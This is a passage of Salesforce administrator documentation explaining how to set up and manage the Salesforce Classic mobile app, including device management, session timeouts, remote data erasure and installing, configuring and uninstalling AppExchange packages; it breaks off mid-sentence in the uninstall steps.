“Customize Application”To create or change custom buttons or links:

To improve the integration between the Salesforce Classic app, Visualforce Mobile, and external websites, you can optionally
create links from native Salesforce records to Visualforce Mobile pages or external websites. To create the links, build text
formula fields on a standard or custom object. The field must be visible on the page layout to appear in the Salesforce Classic
app. The best practice is to include all embedded links in a separate section labeled “Mobile Links” at the bottom of the page
layout. There is currently no way to hide these links in Salesforce, but users can collapse the section to keep the links out of
the way.

To create a link from a native record to a Visualforce Mobile page or Web page:

1. Create a custom field by navigating to the fields area of the appropriate object:

• For standard objects, from Setup, click Customize, then select the appropriate object from the Customize menu, and
click Fields.

• For custom objects, from Setup, click Create > Objects, and select one of the custom objects in the list.

2. Click New in the Custom Fields & Relationships section of the page.
3. Select Formula, then click Next.
4. Enter the field label.

The field name is automatically populated based on the field label you enter.

5. Select Text, then click Next.
6. In the formula editor, create the link to the custom Visualforce page or external website:

• To create a Visualforce link, type "visualforce:///apex/PageName", and replace PageName with the name
of your Visualforce page. You can append parameters to the string, such as ?contactid=" & Id", in order to pass
information from the record in the client application to the Visualforce page.

• To create a Web link, type "weblink:", followed by the URL to which you want the link to point, such as
"weblink:http://www.salesforce.com". You can append parameters to the string in order to pass information
from the record in the client application to the Web page. For example, the following Web link launches a social
networking site from a contact record and performs a search for the contact:

"weblink:http://m.linkedin.com/members?search_term=" &FirstName& "+" &LastName&
"&filter=name&commit=Search"

Note:  The client application passes the Visualforce or Web link with all parameters to the embedded browser.
It is up to the website or Visualforce Mobile page to interpret any parameters. Be sure to construct your
Visualforce Mobile page to consume any parameters passed in the link.
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7. Click Next.
8. Set the field-level security to determine whether the field should be visible or read only for specific profiles, and click Next.
9. Choose the page layouts that should display the field. In the next step, you will customize the layout to change the location

of the field on the page.
10. Click Save.
11. Edit the object's page layout:

• For standard object page layouts, from Setup, click Customize, select the object, and choose the Page Layouts link.
Click Edit next to the name of the page layout you want to modify.

• For custom object page layouts, from Setup, click Create, select the object, and scroll to the Page Layouts section.
Click Edit next to the name of the page layout you want to modify.

12. Drag a Section element from the palette to the page layout and drop it below the existing sections.
13. In the Section Name field, type Mobile Links.
14. Deselect the Edit Page option.
15. Select the 1-column layout, then click OK.
16. Drag the new text formula field from its current location into the new Mobile Links section.
17. Click Save.

See Also:
Setting Up Salesforce Classic

Notifying Users about Salesforce Classic Availability

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“Edit HTML Templates”To create HTML email templates:

“Mass Email”

AND

“Manage Users”

To send mass emails to users:

When you're ready to deploy the Salesforce Classic app to your users, send them an email to notify them about the availability
of the app and provide installation instructions. You can send the email using your corporate email application, like Outlook,
or you can send mass email from Salesforce. Either way, include the URL that launches the download.

• For Android and BlackBerry users, the download URL is mobile.salesforce.com. The link is the same for the initial
download and for subsequent upgrades.

707

Setting Up Salesforce ClassicConfigure Salesforce Mobile Apps



• If you manage BlackBerry devices with a BlackBerry Enterprise Server, you can use Application Push to remotely deliver
Salesforce Classic to users. For more information about BlackBerry Enterprise Application Push, see the Salesforce Classic
Implementation Guide.

• You can obtain the iPhone download URL from iTunes. Open iTunes, click iTunes Store, then search for Salesforce
Classic. Click the app icon to view details about the app. At the top of the iTunes window is a bread crumb path representing
the application's location in the App Store: App Store > Business > Salesforce Classic. Drag-and-drop the path into a
text editor or word processing program to display the app’s download URL.

To send mass email to Salesforce Classic users from Salesforce:

1. Create an email template that informs users about the availability of Salesforce Classic by going to your personal settings
and selecting Email > My Templates. Optionally, you can also create a separate email template for upgrade notifications.
Include the download link in the templates.

2. Create a custom view on the Mass Email page that shows your Salesforce Classic users only.

Note:  The Mobile User checkbox on the user record assigns a mobile license to users, which enables use of
the full version of Salesforce Classic. But other Salesforce users can access the free version of Salesforce Classic
without an assigned mobile license, so you can’t filter for all Salesforce Classic users by license. Create a view for
users of the free versionby filtering by roles or profiles instead.

3. Send mass email to your Salesforce Classic users, using the custom view that you created. From Setup, click Manage Users
> Mass Email Users.

See Also:
Setting Up Salesforce Classic

Salesforce Classic FAQ for Administrators

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

• Is the mobile application secure?

• My users have Android, BlackBerry, and iPhone devices. Can we have multiple types of device in one organization?

• Is there an easy way to deploy the mobile application to all of my BlackBerry users?

Is the mobile application secure?
All data transmitted between Salesforce and the mobile application is fully encrypted and secured over the air.

The mobile application has multiple layers of security at the device level. Device venders provide the ability to set password
or passcode access restrictions. Users must be required to use the device protection in accordance with your organization's
security policy. If the device is locked by password, it is difficult for unauthorized persons to obtain sensitive data.
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Additionally, a user must have valid Salesforce credentials to activate the mobile application on the device. When a user
registers a new wireless device, the Salesforce data on their old wireless device is automatically erased—users can only activate
one mobile device at a time. Users are also warned when a new device is activated using their Salesforce account. If a logged in
user exceeds the administrator-configured inactivity period on the mobile device, the mobile session is terminated and the
password or passcode is required to reestablish the session.

Administrators can also remotely delete data from any lost or stolen devices.

My users have Android, BlackBerry, and iPhone devices. Can we have multiple types
of device in one organization?

Yes, one organization can have multiple types of devices. However, a user can only have one active device.

Is there an easy way to deploy the mobile application to all of my BlackBerry users?
If your organization manages BlackBerry smartphones using the BlackBerry Enterprise Server (BES), you can use Application
Push. Application Push is an administrator-initiated delivery technology on the BlackBerry Enterprise Server that installs
applications on BlackBerry smartphones remotely. This technology is not developed or supported by Salesforce, but BlackBerry
Enterprise Server administrators can use it to install Salesforce Classic on their BlackBerry users' mobile devices.

For instructions on how to configure the BlackBerry Enterprise Server v4.1 to push Salesforce Classic to your BlackBerry
users, see “BlackBerry Enterprise Server Application Push” in the Salesforce Classic Implementation Guide.

You can find detailed information about Application Push in the official BlackBerry Enterprise Server Administrator Guide from
Research in Motion in the sections “Making additional BlackBerry device software and applications available to users” and
“Creating software configurations.” If you have any technical issues with Application Push, contact Research in Motion
Support.

Managing Salesforce Classic Configurations
Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“View Setup and Configuration”To view Salesforce Classic configurations:

“Manage Mobile Configurations”To create, change, or delete Salesforce Classic configurations:

You can manage your existing Salesforce Classic configurations from Mobile Administration > Salesforce Mobile >
Configurations.

• To define a new mobile configuration, click New Mobile Configuration.

• To modify a mobile configuration—including assigning different users or profiles and changing the maximum size of data
sets—click Edit.

• To activate a mobile configuration, click Edit, select the Active checkbox, then click Save. Deselect Active to deactivate
the mobile configuration.
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• To delete a mobile configuration, click Del.
• To view details about a mobile configuration, click its name.

From a mobile configuration detail page, you can:

◊ Modify data sets for a mobile configuration by clicking Edit in the Data Sets related list.

◊ Change the properties of mobilized objects by clicking Edit next to an object name in the Mobile Object Properties
related list.

◊ Customize mobile configuration tabs by clicking Edit in the Mobile Tabs related list.

◊ Create custom views for a mobile configuration by clicking Edit in the Mobile Views related list.

◊ Clone the mobile configuration by clicking Clone.

See Also:
Salesforce Classic Overview for Administrators

Managing Salesforce Classic Permissions

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“View Setup and Configuration”To view Salesforce Classic configurations:

“Manage Mobile Configurations”To create, change, or delete Salesforce Classic configurations:

A mobile license is required for each user who will access the full version of the Salesforce Classic app. You allocate mobile
licenses using the Mobile User checkbox on the user record. For organizations using Unlimited and Developer Editions,
salesforce.com provides a mobile license for each Salesforce license and the Mobile User checkbox is enabled by default for
all users. Organizations using Professional or Enterprise Editions must purchase mobile licenses separately and allocate them
manually.

Note:  The Mobile User checkbox is disabled by default for new Unlimited Edition users.

To prevent users from activating the full version of Salesforce Classic on their mobile devices before you’re ready to deploy
the app, disable the Mobile User checkbox for all your users.

Any Salesforce user who doesn't have a mobile license can download a free, restricted version of Salesforce Classic. Starting
with Summer ‘13, the free version of Salesforce Classic is disabled by default in all new organizations. You can enable it to
give users access to Salesforce on their mobile devices.

To enable the free version of Salesforce Classic:
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1. From Setup, click Mobile Administration > Salesforce Classic > Settings.
2. Click Edit.
3. Select Enable Mobile Lite.
4. Click Save.

See Also:
Salesforce Classic Overview for Administrators

Managing Salesforce Classic Tabs

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“View Setup and Configuration”To view Salesforce Classic configurations:

“Manage Mobile Configurations”To manage Salesforce Classic tabs:

To manage the tabs for a Salesforce Classic configuration, click Mobile Administration > Salesforce Mobile > Configurations.
Then click the name of the mobile configuration and scroll down to the Mobile Tabs related list.

If you’ve already customized the configuration’s tabs, the Mobile Tabs related list shows the selected tabs.

• To change the tab setup, click Edit.
• To delete the mobile tab setup and use the default tab behavior instead, click Reset to Default.

If you haven’t customized the configuration’s tabs, the related list indicates that the default tab behavior is used for the
configuration. To customize the tabs used by the configuration and define their order, click Customize Tabs.

See Also:
Salesforce Classic Overview for Administrators
Managing Salesforce Classic Configurations
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Managing Salesforce Classic Views

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“View Setup and Configuration”To view Salesforce Classic devices and users:

“Manage Mobile Configurations”To manage Salesforce Classic custom views:

To manage the custom views for a Salesforce Classic configuration, click Mobile Administration > Salesforce Mobile >
Configurations. Then click the name of the mobile configuration and scroll down to the Mobile Views related list:

• To see a list of all your custom views, choose All Objects in the Select an object drop-down list. You can also use
the Select an object drop-down list to filter the views by object type.

• To create a new mobile view, select the object type from the Select an object drop-down list, and then click New Mobile
View.

• To make changes to a custom mobile view, click Edit next to the view name.

• To delete a mobile custom view, click Del next to the view name.

• To view details about a mobile custom view, click its name.

See Also:
Salesforce Classic Overview for Administrators
Managing Salesforce Classic Configurations
Managing Salesforce Classic Devices
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Salesforce Classic Usage Data in Custom Report Types

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“Manage Custom Report Types”To create or update custom report types:

“Modify All Data”To delete custom report types:

You can create custom report types with data that shows how your organization uses Salesforce Classic. For example, the
reports can show how often users access Salesforce Classic, which mobile device models they use, and so forth.

To create a custom report type with Salesforce Classic usage data, select the Mobile Session Primary Object when defining
a custom report type. When you select the fields for the custom report type, choose from the following Salesforce Classic-specific
fields.

DefinitionMobile Usage Data Point

Wireless carrierBrand

Total size of records on deviceData Size (Bytes)

Unique physical address of device (PIN for BlackBerry or
UDID for iOS)

Device Address

Installed version of Salesforce ClassicDevice Application Version

Model of deviceDevice Model

Version of operating system installed on deviceDevice Operating System Version

Duration of the mobile session in secondsDuration

Date of last registration or activationLast Registration Date

Date of last communication received from deviceLast Status Date

Manufacturer of deviceManufacturer

Size of metadata (page layouts, picklist values, and so forth)
on the device

Metadata Size (Bytes)

Name of the device userOwner: Full Name

Date the mobile session startedSession Start Date

Indicator that the user's data set exceeds the maximum allowed
size by the mobile configuration

Status
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Note:

• Mobile sessions are similar to Web-based sessions in login history reports; however, mobile sessions have a fixed
timeout value of 20 minutes. Salesforce creates a new Mobile Session when a user logs into or launches Salesforce
Classic after 20 minutes of inactivity in the app or on the device in general.

• Mobile session reports only have usage data for the Salesforce Classic app and not the Chatter mobile app.

• Some devices do not provide every physical attribute. For example, Apple devices do not provide brand.

Managing Salesforce Classic Devices
Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“View Setup and Configuration”To view Salesforce Classic devices and users:

“Manage Mobile Configurations”To manage Salesforce Classic devices:

After a user installs the Salesforce Classic app on a mobile device and logs in for the first time, Salesforce collects information
about the device and associates it with the user's record. The device information is read only.

While the device entry is created automatically, you can still view and manage all the mobile users and devices in your
organization from Setup by clicking Mobile Administration > Salesforce Mobile > Users and Devices.

From the All Mobile Users and Devices page, you can:

• View the list of users in your organization who have been enabled to use Salesforce Classic.

• Create custom list views to see different subsets of your mobile users. For example, create a view that shows the users who
have never logged in to Salesforce from theSalesforce Classic app to evaluate the effectiveness of your organization's
Salesforce Classic deployment efforts.

• View details about a mobile device by clicking the device address.

• View details about a specific user by clicking the username.

• View details about a mobile configuration by clicking the mobile configuration name.

• Perform these actions on multiple users at the same time:

◊ Adjust the mobile session timeout value

◊ Erase the Salesforce data from a user's mobile device

◊ Delete a mobile device from a user's record

• Find out why a user's device isn’t synchronizing by hovering your mouse over the red error icon in the Status column.
Additional information about the synchronization errors appears on the device's detail page.
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Note:  You can also manage mobile users from the Assigned Mobile Devices related list on the user detail page.

See Also:
Permanently Linking Salesforce Classic Users to a Mobile Device
Viewing Salesforce Classic Device Information
Setting Salesforce Classic Session Timeout Values
Erasing Data in Salesforce Classic
Deleting Mobile Devices
Salesforce Classic Overview for Administrators
Managing Salesforce Classic Configurations

Permanently Linking Salesforce Classic Users to a Mobile Device
You can prevent mobile users from registering any mobile device other than the one they used for their initial Salesforce Classic
activation.

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“View Setup and Configuration”To view Salesforce Classic settings:

“Manage Mobile Configurations”To change Salesforce Classic settings:

By default, Salesforce automatically associates a device record with the mobile user who most recently activated the device, so
administrators don’t need to update the device record to assign the device to another user. While this behavior makes it easy
to switch devices between users in your organization, some administrators prefer that users are permanently linked to the
devices they were originally assigned. This helps administrators of organizations with highly sensitive data ensure that their
users do not access corporate data from personal devices.

To permanently link a user to a mobile device:

1. From Setup, click Mobile Administration > Salesforce Mobile > Settings.
2. Click Edit.
3. Select Permanently Link User to Mobile Device.
4. Click Save.

Warning:  Enabling the Permanently Link User to Mobile Device setting requires administrative action
when users need to switch devices. You must manually delete the existing device on page 682 from a user's record in
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order for the user to register a different device. If you don’t delete the device, the user won’t be able to access the
Salesforce Classic app.

See Also:
Managing Salesforce Classic Devices

Viewing Salesforce Classic Device Information

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“View Setup and Configuration”To view Salesforce Classic devices and users:

“Manage Mobile Configurations”To manage Salesforce Classic devices:

Salesforce collects information about a mobile user's device the first time the user logs in to the Salesforce Classic app. There
are two ways to access the device details:

• Click Mobile Administration > Salesforce Mobile > Users and Devices, and then click a device address in the list view.

• From Setup, click Manage Users > Users. Click Edit next to a user's name, and then click the device address in the
Assigned Mobile Devices related list.

From the Mobile Device page, you can:

• Review device information

• Adjust the mobile session timeout value

• Erase the Salesforce data from a user's device

• Delete a device from a user's record

Below is a description of the fields in alphabetical order that are stored for each mobile device in your organization.

DescriptionField

The brand of the mobile device, if available.Brand

The name of the carrier providing service for the mobile device,
if available.

Carrier

The date and time the device established a connection to the
mobile server. The device loses a connection when the battery

Connected Since

dies or when the session is closed because the server has not
received data from the device for a long period of time.
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DescriptionField

The state of the device connection. Possible values for this
field are Connected, Not Connected, and Not Available.

Connection Status

The name of the first user who registered the mobile device
and the time and date the registration occurred.

Created By

The size of the Salesforce data currently stored on the user's
mobile device. The mobile device periodically sends this

Data Size

information to Salesforce, which is helpful when
troubleshooting synchronization errors resulting from an
exceeded data limit.

The unique identifier of the user's mobile device.Device Address

The model of the mobile device.Device Model

A flag indicating whether the device is a simulator or a mobile
device. A simulator is a software application that emulates the
behavior of a mobile device.

Is Simulator?

The last time a full data set was downloaded to the mobile
device. If a user's data set exceeds the limit defined in the

Last Activated

assigned mobile configuration, the device can be registered
but not activated.

The last time data was received from the device. This
information is helpful for troubleshooting connection issues.

Last Data Received

The last time a user registered the mobile device. The
registration process creates the device record in Salesforce and
associates it with the user who registered it.

Last Registration

The last time the mobile device notified Salesforce that the
device is no longer synchronizing data due to an error. The

Last Status Date

Last Status Date field is only visible when an error is
present.

The manufacturer of the mobile device.Manufacturer

The size of the Salesforce metadata currently stored on the
user's mobile device. Metadata consists of page layout and

Metadata Size

schema information, and the amount of metadata sent to a
device can be very high depending on the size of your
organization and the complexity of its setup.

The name of the last user who registered the mobile device
and the time and date the registration occurred.

Modified By

The number of messages queued on the mobile server waiting
to be sent to the device.

Number of Pending Outgoing Messages

The type of operating system installed on the mobile device:
Android, BlackBerry, or iPhone.

Operating System
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DescriptionField

The version number of the operating system installed on the
mobile device.

Operating System Version

The phone number associated with the mobile device.Phone Number

The version number and build number of the mobile client
application installed on the device.

Salesforce Classic Version

The total data size of the messages queued on the device
waiting to be sent to the mobile server. Because the server

Size of Pending Outgoing Messages (Bytes)

processes messages almost instantaneously, this value is usually
0.

The total data size of the outbound message queue on the
mobile server.

Size of Outgoing Messages (Bytes)

Indicates whether any synchronization errors exist between
the device and Salesforce. The Status field is only visible

Status

when an error is present. The two error statuses are Data Limit
Exceeded and Unknown Error.

The Salesforce username of the user who is associated with
the mobile device.

Username

Note:  If Salesforce detects the selected device was registered by a user in another organization, an error displays on
the device detail page. This can happen when a device was registered to a user in your sandbox organization and then
later activated by a user in your production organization. To remove the old device record from your organization,
simply delete the device.

See Also:
Managing Salesforce Classic Devices
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Setting Salesforce Classic Session Timeout Values

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“Manage Mobile Configurations”To set Salesforce Classic session timeout values:

For security reasons, the Salesforce Classic app is set to lock out users after 10 minutes of inactivity. Administrators can adjust
or disable this setting on a device-by-device basis. For example, you might disable the Salesforce Classic timeout setting if a
mobile device's operating system has its own locking mechanism.

To change the Salesforce Classic session timeout value:

1. Navigate to one of these pages:

• To deal with multiple devices at the same time, click Mobile Administration > Salesforce Mobile > Users and Devices.
In the list view on the Mobile Users and Devices page, select the desired devices.

• To deal with a specific device, from Setup, click Manage Users > Users. Click a user's name, then click the device
address in the Assigned Mobile Devices related list to see the Mobile Device page.

2. Click Set Mobile Session Timeout.
3. Choose the new timeout value in minutes. You can also choose Never Expire if users shouldn’t be locked out of the app.
4. Click Save.

Salesforce attempts to send a message containing the new session timeout setting to the selected mobile devices.

5. A confirmation page summarizes the results for each mobile device you selected.

Mobile Session Timeout Results

After Salesforce sends the new session timeout session to the selected mobile devices, a results page provides information about
the status of each message. The table below describes the three possible outcomes:

DescriptionResult

The Salesforce Classic server has sent the message to the
device. Salesforce can’t detect if the message was received by
the device.

Message successfully queued

A temporary communication problem between Salesforce and
the Salesforce Classic server prevented the message from being
sent. Try again later.

Unable to send message
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DescriptionResult

The selected mobile user never registered a device, so therefore
the message could not be sent.

User has no mobile device

See Also:
Managing Salesforce Classic Devices

Erasing Data in Salesforce Classic

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“Manage Mobile Configurations”To delete the Salesforce data on a device running Salesforce
Classic:

When a user accesses the Salesforce Classic app, the user’s mobile device contains both the mobile app and a set of the user's
Salesforce data. An administrator can remove the data from a device without uninstalling the mobile app. This is an effective
security tool when a user misplaces his or her device. You also must erase a device's data if you plan to give it to another user.

To erase the Salesforce data on one or more mobile devices:

1. Navigate to one of these pages:

• To deal with multiple devices at the same time, click Mobile Administration > Salesforce Mobile > Users and Devices.
In the list view on the Mobile Users and Devices page, select the desired devices.

• To deal with a specific device, from Setup, click Manage Users > Users. Click a user's name, then click the device
address in the Assigned Mobile Devices related list to see the Mobile Device page.

2. Click Erase Data, then click OK.

Salesforce attempts to send a message to the mobile devices to erase the data.

Erase Data Results

After Salesforce sends the message to the mobile devices to erase data, a results page provides information about the status of
each message. The table below describes the three possible outcomes:
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DescriptionResult

The Salesforce Classic server has sent the message to the
device. Salesforce can’t detect if the message was received by
the device.

Message successfully queued

A temporary communication problem between Salesforce and
the Salesforce Classic server prevented the message from being
sent. Try again later.

Unable to send message

The selected mobile user never registered a device, so therefore
the message could not be sent.

User has no mobile device

See Also:
Managing Salesforce Classic Devices
Managing Salesforce Classic Devices
Deleting Mobile Devices

Deleting Mobile Devices

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“View Setup and Configuration”To view mobile devices and users:

“Manage Mobile Configurations”To delete mobile devices:

There are two instances when you would delete a mobile device from a user's record:

• Your organization's mobile settings permanently link mobile users to their devices, and you need to assign a device to a
different user. If you did not enable this setting, Salesforce automatically associates a device record with the mobile user
who most recently activated the device, so it is unnecessary to delete a device to assign it to another user.

• You want to move a device from your sandbox organization to your production organization.

To delete a mobile device:

1. Navigate to one of these pages:

• To deal with multiple devices at the same time, click Mobile Administration > Salesforce Mobile > Users and Devices.
In the list view on the Mobile Users and Devices page, select the desired devices.

• To deal with a specific device, from Setup, click Manage Users > Users. Click a user's name, then click the device
address in the Assigned Mobile Devices related list to see the Mobile Device page.
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2. On the Mobile Devices and Users page, select one or more devices, then click Delete Device. On the Mobile Device page,
click Delete.

3. Click OK.

Salesforce attempts to delete the selected device(s).

4. A confirmation page summarizes the results for each mobile device you selected.

Delete Device Results

After Salesforce sends the message to the mobile server to delete the devices, a results page provides information about the
status of each device. The table below describes the three possible outcomes:

DescriptionResult

Salesforce removed the device record from your organization.Device deleted.

A temporary communication problem between Salesforce and
the mobile server prevented the device from being deleted.
Try again later.

Device cannot be deleted at this time. Please try again later.

The selected mobile user never registered a device, so therefore
the message could not be sent.

User has no mobile device.

See Also:
Managing Salesforce Classic Devices
Erasing Data in Salesforce Classic

INSTALL PACKAGES AND MANAGE APPS

Installed Packages
You can install packages into your Salesforce organization, and then configure and manage them in Setup by clicking Installed
Packages.
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Installing a Package

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Download AppExchange Packages”To install packages:

If you received an installation link, click the link and skip to step 4 below. Otherwise follow this procedure from the beginning.

Note: Only one person in your organization can install or upload a package at a time.

1. Click the AppExchange link in your organization or go directly to www.appexchange.com.
2. Browse the AppExchange site to find the application you want to install.
3. Click Get It Now from the application information page.

Note:  If the listing does not have a Get It Now option, contact the publisher for more information.

4. Enter your username and password, read the user terms, select the checkbox, and click Continue.

Note:  If you are installing into a sandbox, replace the “www.salesforce.com” portion of the installation link with
“test.salesforce.com”. Note that this package is removed from your sandbox organization whenever you create a
new sandbox copy.

5. If the package is password protected, enter the password you received from the publisher.
6. Review the package items and click Continue.

Note:  Some package items, such as validation rules, record types, or custom settings may not display in the
Package Item list but are included in the package and installed with the other items. If there are no items in the
Package Items list, the package may contain only minor changes not recorded.

7. If it’s a managed package, review the Connected Apps that are listed to ensure they’re acceptable, and click Next to continue
or Cancel to cancel package installation.

Note:  Every Connected App represents a trusted application that is granted access to a user's Salesforce data after
the user and the application have been verified.

8. If the installing package contains a remote site setting, you need to approve access to websites outside of Salesforce. The
dialog box lists all the websites that the package communicates with. It is highly recommended that a website uses SSL
(secure sockets layer) when transmitting data. After making sure that the websites are safe, check Yes, grant access to these
third-party websites and click Continue, or click Cancel to cancel installing the package.

Warning:  By installing remote site settings, you are allowing the package to transmit data to and from a third
party website outside the Salesforce service. Contact the publisher before using the package to understand what
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data is transmitted and how it's used. If you have an internal security contact, ask them to review the application
and understand its impact before use.

9. Review the API access that package components have been granted to ensure they are acceptable.
10. When installing unmanaged packages, you can select Resolve Naming Conflicts Automatically. When this is

selected, Salesforce changes the name of the component in the package being installed.
11. In Enterprise, Unlimited, and Developer Editions, choose a security option, and click Next:

Grant access to admins only

Specifies the following settings on the installing administrator’s profile and any profile with the "Customize
Application" permission:
• Object permissions—“Read,” “Create,” “Edit,” “Delete,” “View All,” and “Modify All” are all enabled
• Field-level security—Set to visible and editable for all fields
• Apex classes—Enabled
• Visualforce pages—Enabled
• App settings—Enabled
• Tab settings—Determined by the package creator
• Page layout settings—Determined by the package creator
• Record Type settings—Determined by the package creator

After installation, if you have Enterprise, Unlimited, or Developer Edition, you can set the appropriate user and
object permissions on custom profiles as needed.

Grant access to all users

Specifies the following settings on all internal custom profiles:
• Object permissions—“Read,” “Create,” “Edit,” “Delete,” “View All,” and “Modify All” are all enabled
• Field-level security—Set to visible and editable for all fields
• Apex classes—Enabled
• Visualforce pages—Enabled
• App settings—Enabled
• Tab settings—Determined by the package creator
• Page layout settings—Determined by the package creator
• Record Type settings—Determined by the package creator

Note: The Customer Portal User, Customer Portal Manager, High Volume Customer Portal, Authenticated
Website, Partner User, and standard profiles receive no access.

Select security settings

Allows you to choose the usage access for all existing custom profiles in your organization. You can set each profile
to have full access or no access for the new package and all its components.

Note:

• Depending on the type of install, you might not see this step. For example, in Group and Professional Editions,
or if the package does not contain a custom object, Salesforce skips this step and the next, giving all users full
access.
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• Permission sets aren't included in the security options. If your package includes permission sets, assign them
after installation.

12. In Enterprise, Unlimited, and Developer Editions, if you chose Select security settings, select the level of access to give
users in each profile and click Next. Standard options are:

• Full Access—Specifies the following settings for each profile:

◊ Object permissions—“Read,” “Create,” “Edit,” “Delete,” “View All,” and “Modify All” are all enabled
◊ Field-level security—Set to visible and editable for all fields
◊ Apex classes—Enabled
◊ Visualforce pages—Enabled
◊ App settings—Enabled
◊ Tab settings—Determined by the package creator
◊ Page layout settings—Determined by the package creator
◊ Record Type settings—Determined by the package creator

• No Access—Specifies the same settings as Full Access, except all object permissions are disabled.

You might see other options if the publisher has included settings for custom profiles. You can incorporate the settings of
the publisher’s custom profiles into your profiles without affecting your existing settings. Choose the name of the profile
settings in the drop-down list next to the profile you want them applied to. The current settings in that profile remain
intact.

Alternatively, click Set All next to an access level to give this setting to all user profiles.

13. Click Install. If your installation fails, see Why did my install or upgrade fail? on page 741.

Note:  During installation, Salesforce checks and verifies any dependencies. An installer’s organization must meet
all dependency requirements listed on the Show Dependencies page or else the installation will fail. For example,
the installer's organization must have divisions enabled to install a package that references divisions.

Note:  When you install a component that contains Apex, all unit tests for your organization are run, including
the unit tests contained in the new package. If a unit test relies on a component that is initially installed as inactive,
such as a workflow rule, this unit test may fail. You can select to install regardless of unit test failures.

14. Click OK.
15. Configure components in the package.
16. If the package includes permission sets, assign the included permission sets to your users who need them. In managed

packages, you can't make changes to permission sets that are included in the package, but subsequent upgrades happen
automatically. If you clone a permission set that comes with a managed package or create your own, you can make changes
to the permission set, but subsequent upgrades won't affect it.

17. If you are reinstalling a package and want to re-import the package data using the export file you received after uninstalling,
see Importing Package Data on page 733.
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18. If you installed a managed package, click Manage Licenses, to assign licenses to users.

See Also:
Upgrading Packages
Installation Guide: Installing Apps from Force.com AppExchange
Installed Packages

Configuring Installed Packages

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Download AppExchange Packages”To install packages:

“Customize Application”To configure installed packages:

Before making the package available to your users, make any necessary changes for your implementation. Depending on the
contents of the package, you might need to customize the following items:

Configure Option

If the publisher included a link to an external website with information about configuration, AppExchange Downloads
page displays a Configure option next to the package in Setup when you click Installed Packages. Click Configure to
view the publisher's suggested configurations.

Custom Fields and Custom Links

Add any necessary custom fields or links to the new custom objects.

Custom Object

Enable tracking on objects that aren't in this package, but that have fields that are tracked in Chatter. For example, if
you want to track a custom field on Account, you must make sure the Account standard object is enabled for tracking.

Custom Report Types

If the Report Type Name of a custom report type matches one used within your organization, change the Report
Type Name after you install the package to avoid any confusion between the two report types.

Dashboard Running User

The Running User for any dashboards are set to the user installing the package. You can edit the properties of the
dashboard and change the Running User to a user that has the security settings you want applied to the dashboard.

Folders

When apps contain documents, email templates, reports, or dashboards, Salesforce creates new folders in the installer’s
organization using the publisher’s folder names. Make sure these folder names are unique in your organization.

All users can see new folders. Configure folder settings before you deploy if you want them to have limited visibility.
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Home Page Layouts

Custom home page layouts included in the package are not assigned to any users. To make them available to your users,
assign them to the appropriate profiles.

List Views

List views included in apps are visible to all users. Change the visibility of these list views if necessary.

Page Layouts

All users are assigned the default page layout for any custom objects included in the package. Administrators of Enterprise,
Unlimited, and Developer Edition organizations can configure the page layout for the appropriate users.

If a custom object in the package includes any relationships to standard objects, add them as related lists on the appropriate
page layouts.

If the package includes any custom links, add them to the appropriate page layouts.

If your organization has advanced currency management enabled, currency roll-up summary fields are invalid if they are
on accounts and summarizing opportunity values, or on opportunities and summarizing custom object values. Remove
these fields from any page layouts.

Permission Sets

Assign permission sets included in a package to the users who need access to the package.

You can't edit permission sets that are included in a managed package. If you clone a permission set that comes with the
package or create your own, you can make changes to the permission set, but subsequent upgrades won't affect it.

Translation Workbench

Translated values for installed package components are also installed for any language that the developer has included.
Any package components the developer has customized within setup, such as a custom field or record type, display in
the installer’s setup pages in the developer’s language (the language used when defining these components). Users in the
installer’s organization automatically see translated values if their personal language is included in the package. Additionally,
installers can activate additional languages as long as the Translation Workbench is enabled.

Workflow Alerts

If the recipient of a workflow alert is a user, Salesforce replaces that user with the user installing the package. You can
change the recipients of any installed workflow alerts.

Workflow Field Updates

If a field update is designed to change a record owner field to a specific user, Salesforce replaces that user with the user
installing the package. You can change the field value of any installed field updates.

Workflow Outbound Messages

Salesforce replaces the user in the User to send as field of an outbound message with the user installing the package.
You can change this value after installation.

Workflow Rules

Workflow rules are installed without any time-based triggers that the developer might have created. Set up time-based
triggers as necessary.
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Workflow Tasks

Salesforce replaces the user in the Assigned To field with the user installing the package. You can change this value
after installation.

Make any more customizations that are necessary for your implementation.

Note:  Anything you add to a custom app after installation will be removed with the custom app if you ever uninstall
it.

See Also:
Installed Packages

Uninstalling a Package
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Download AppExchange Packages”To uninstall packages:

You can remove any installed package, including all of its components and all data in the package. Additionally, any custom
fields, links, or anything else you added to the custom app after installation are also removed.

To remove a package:

1. From Setup, click Installed Packages.
2. Click Uninstall next to the package that you want to remove.
3. Select Yes, I want to uninstall... and click Uninstall.
4. After an uninstall, Salesforce automatically creates an export file containing the package data, as well as any associated

